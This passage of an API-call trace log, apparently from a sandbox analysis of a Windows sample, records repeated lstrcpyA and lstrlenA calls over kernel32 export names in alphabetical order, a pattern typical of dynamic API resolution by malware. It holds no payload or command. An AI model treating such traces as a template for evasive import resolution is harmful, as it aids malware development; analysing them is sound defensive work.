returned="AddVectoredContinueHandler" [0083.391] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0083.391] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0083.391] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0083.391] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0083.391] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0083.391] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0083.392] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0083.392] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0083.392] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0083.392] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0083.392] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0083.392] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0083.392] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0083.392] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0083.392] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0083.392] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0083.392] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0083.392] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0083.392] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0083.392] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0083.392] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0083.392] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0083.392] lstrlenA (lpString="BACKUPREAD") returned 10 [0083.392] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0083.392] lstrlenA (lpString="BACKUPSEEK") returned 10 [0083.392] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0083.392] lstrlenA (lpString="BACKUPWRITE") returned 11 [0083.392] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0083.392] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0083.392] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0083.392] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0083.392] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0083.392] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0083.392] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0083.392] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0083.392] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0083.392] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0083.392] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0083.392] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0083.392] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0083.392] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0083.392] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0083.393] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0083.393] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0083.393] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0083.393] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0083.393] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0083.393] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0083.393] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0083.393] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0083.393] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0083.393] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0083.393] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0083.393] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0083.393] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0083.393] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0083.393] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0083.393] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0083.393] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0083.393] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0083.393] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0083.393] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0083.393] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0083.393] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0083.393] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0083.393] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0083.393] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0083.393] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0083.393] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0083.393] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0083.393] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0083.393] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0083.393] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0083.393] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0083.393] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0083.393] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0083.393] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0083.393] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0083.394] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0083.394] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0083.394] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0083.394] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0083.394] lstrlenA (lpString="BEEP") returned 4 [0083.394] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0083.394] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0083.394] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0083.394] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0083.394] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0083.394] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0083.394] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0083.394] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0083.394] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0083.394] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0083.394] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0083.394] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0083.394] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0083.394] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0083.394] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0083.394] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0083.394] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0083.394] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0083.394] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0083.394] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0083.394] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0083.395] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0083.395] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0083.395] lstrlenA (lpString="CANCELIO") returned 8 [0083.395] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0083.395] lstrlenA (lpString="CANCELIOEX") returned 10 [0083.395] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0083.395] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0083.395] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0083.395] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0083.395] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0083.395] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0083.395] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0083.395] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0083.395] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0083.395] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0083.395] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0083.395] lstrlenA (lpString="CHECKELEVATION") returned 14 [0083.395] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0083.395] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0083.395] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0083.395] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0083.395] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0083.395] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0083.395] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0083.395] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0083.395] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0083.395] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0083.395] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0083.395] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0083.395] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0083.395] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0083.395] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0083.395] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0083.395] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0083.395] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0083.395] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0083.395] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0083.396] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0083.396] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0083.396] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0083.396] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0083.396] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0083.396] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0083.396] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0083.396] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0083.396] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0083.396] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0083.396] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0083.396] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0083.396] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0083.396] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0083.396] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0083.396] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0083.396] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0083.396] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0083.396] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0083.396] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0083.396] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0083.396] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0083.396] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0083.396] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0083.396] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0083.396] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0083.396] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0083.396] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0083.396] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0083.396] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0083.396] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0083.396] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0083.396] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0083.396] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0083.396] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0083.396] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0083.397] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0083.397] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0083.397] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0083.397] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0083.397] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0083.397] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0083.397] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0083.397] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0083.397] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0083.397] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0083.397] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0083.397] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0083.397] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0083.397] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0083.397] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0083.397] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0083.397] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0083.397] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0083.397] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0083.397] lstrlenA (lpString="COPYCONTEXT") returned 11 [0083.397] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0083.397] lstrlenA (lpString="COPYFILEA") returned 9 [0083.397] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0083.397] lstrlenA (lpString="COPYFILEEXA") returned 11 [0083.397] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0083.397] lstrlenA (lpString="COPYFILEEXW") returned 11 [0083.397] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0083.397] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0083.397] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0083.397] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0083.397] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0083.397] lstrlenA (lpString="COPYFILEW") returned 9 [0083.397] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0083.397] lstrlenA (lpString="COPYLZFILE") returned 10 [0083.397] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0083.397] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0083.398] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0083.398] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0083.398] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0083.398] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0083.398] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0083.398] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0083.398] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0083.398] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0083.398] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0083.398] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0083.398] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0083.398] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0083.398] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0083.398] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0083.398] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0083.398] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0083.398] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0083.398] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0083.398] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0083.398] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0083.398] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0083.398] lstrlenA (lpString="CREATEEVENTA") returned 12 [0083.398] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0083.398] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0083.398] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0083.398] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0083.398] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0083.398] lstrlenA (lpString="CREATEEVENTW") returned 12 [0083.398] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0083.398] lstrlenA (lpString="CREATEFIBER") returned 11 [0083.398] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0083.398] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0083.398] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0083.398] lstrlenA (lpString="CREATEFILEA") returned 11 [0083.398] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0083.398] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0083.398] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0083.399] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") 